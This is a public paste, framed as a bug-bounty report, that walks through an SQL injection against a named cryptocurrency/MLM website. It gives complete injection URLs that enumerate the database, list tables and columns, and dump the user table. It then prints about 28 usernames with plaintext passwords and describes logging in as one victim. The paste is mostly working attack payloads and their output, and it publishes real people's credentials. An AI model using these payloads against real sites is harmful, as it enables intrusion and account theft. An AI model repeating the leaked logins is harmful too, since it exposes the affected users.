API tools faq
paste
Guest User

bounty.txt

a guest
Sep 19th, 2018
59
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.46 KB | None | 0 0
raw download clone embed print report
  1. * bounty reward website https://amorcoin.io *
  2. bug is on page event-details.php?event=8 there is a gap to execute the database via sql command.
  3. following step.
  4.  
  5. *vuln test with a sign (*)
  6. this is the inject point.
  7. this link :
  8. https://amorcoin.io/event-details.php?event=8%27
  9. if vuln there will be an error in the page
  10. this a proof :
  11. https://prnt.sc/kwh41d
  12.  
  13. *continue by calling the sql command with an order by.
  14. this link :
  15. https://amorcoin.io/event-details.php?event=8' order by+7-- -+
  16. order by di is already known up to 7.
  17. this a proof :
  18. https://prnt.sc/kwh7mq
  19.  
  20. *further with the (union by select) command this command calls the database and reads the contents of the database.
  21. link :
  22. https://amorcoin.io/event-details.php?event=-8%27%20union%20all%20select+1,2,3,4,5,6,7--%20-+
  23. this a proof :
  24. https://prnt.sc/kwh66j
  25. above looks beautiful number (3) this number that we will execute
  26.  
  27. *we continue by dismantling the database and searching for a username and password
  28. dump link get name database:
  29. https://amorcoin.io/event-details.php?event=-8' union all select+1,2,database(),4,5,6,7-- -+
  30. found : amorcoin_acoin
  31. this a proof :
  32. https://prnt.sc/kwh7di
  33. dump link get name table :
  34. https://amorcoin.io/event-details.php?event=-8' union all select+1,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),4,5,6,7-- -+
  35.  
  36. found :
  37. 0001: admin_sub
  38. 0002: blockchain_trans_history
  39. 0003: bvs_history
  40. 0004: coin_transactions
  41. 0005: coin_transactions_history
  42. 0006: coingate_transactions
  43. 0007: countries
  44. 0008: mlm_address
  45. 0009: mlm_admin
  46. 0010: mlm_autopricing
  47. 0011: mlm_banner
  48. 0012: mlm_binary
  49. 0013: mlm_binaryplan
  50. 0014: mlm_city
  51. 0015: mlm_cms
  52. 0016: mlm_country
  53. 0017: mlm_document
  54. 0018: mlm_events
  55. 0019: mlm_faq
  56. 0020: mlm_feedback
  57. 0021: mlm_generalsetting
  58. 0022: mlm_help
  59. 0023: mlm_language
  60. 0024: mlm_lending
  61. 0025: mlm_lendinghistory
  62. 0026: mlm_lendingpayout
  63. 0027: mlm_membership
  64. 0028: mlm_news
  65. 0029: mlm_newsletter
  66. 0030: mlm_outbox
  67. 0031: mlm_pages
  68. 0032: mlm_payoutcalc
  69. 0033: mlm_prewords
  70. 0034: mlm_price
  71. 0035: mlm_products
  72. 0036: mlm_promotionoffer
  73. 0037: mlm_purchase
  74. 0038: mlm_quit
  75. 0039: mlm_rank
  76. 0040: mlm_re_purchase
  77. 0041: mlm_redeem
  78. 0042: mlm_reg_count
  79. 0043: mlm_regcount
  80. 0044: mlm_register
  81. 0045: mlm_reward
  82. 0046: mlm_slider
  83. 0047: mlm_stake
  84. 0048: mlm_stakehistory
  85. 0049: mlm_stakepayout
  86. 0050: mlm_state
  87. 0051: mlm_stocks
  88. 0052: mlm_sunplan
  89. 0053: mlm_testimonial
  90. 0054: mlm_transwords
  91. 0055: mlm_transwords_old
  92. 0056: mlm_user_status
  93. 0057: mlm_walletcoin
  94. 0058: mlm_walletusd
  95. 0059: mlm_wastage
  96. 0060: mlm_widthdrawcoin
  97. 0061: mlm_withdrawrequsets
  98. 0062: mlmcms
  99. 0063: package
  100. 0064: package_entry
  101. 0065: split_partition
  102. 0066: syn_history
  103. 0067: unlock_request
  104.  
  105. this a proof :
  106. https://prnt.sc/kwh8r3
  107.  
  108. *and now we try to see the "mlm register" column to find out the username and password
  109. dump link :
  110. https://amorcoin.io/event-details.php?event=-8' union all select+1,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x6d6c6d5f7265676973746572)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR%2b1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),4,5,6,7-- -+
  111. found :
  112. 11: username
  113. 12: user_fname
  114. 13: user_lname
  115. 14: user_password
  116.  
  117. this a proof :
  118. https://prnt.sc/kwhawi
  119.  
  120. dump link :
  121. https://amorcoin.io/event-details.php?event=-8' union all select+1,2,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(amorcoin_acoin.mlm_register)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x3a,user_password,0x3c62723e))))x),4,5,6,7-- -+
  122.  
  123. found :
  124. Amoradmin:JasonLee090282
  125. siewtai:123456
  126. sophiaooi:abcd1234
  127. Susan:lam123466
  128. kentchan:bkyeoh51
  129. choi wei hoe:831109055265
  130. Christ Goh:123456
  131. Maxwell222:123456
  132. stanleyteoh:teoh5641
  133. kennychp:kennychp097173
  134. gohwah:abc3710332
  135. lyvender:123456
  136. clementx7:123456
  137. peiling:123456
  138. alice2288:123456
  139. yokechoy65:123456
  140. felicia8:felicia5542
  141. sengkim8:felicia5542
  142. ping5604:123456
  143. ee96ee:707290
  144. amy3986:707290
  145. KU1752:Qiuweiqi@1752
  146. gohzz:gzz780920
  147. eyh1973:eyh730116
  148. kawkin:123456
  149. cellywong:123456
  150. lbyeoh60:123456
  151. lhchew64:123456
  152.  
  153. this a proof :
  154. https://prnt.sc/kwhan2
  155.  
  156. *now we try to login
  157. link :
  158. https://amorcoin.io/login.php
  159. account :
  160. username : ee96ee
  161. password : 707290
  162. work... im sucses login..
  163. link :
  164. https://amorcoin.io/profile.php?succ
  165. this a proof :
  166. https://prnt.sc/kwhc3y
  167.  
  168. * thanks alot
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!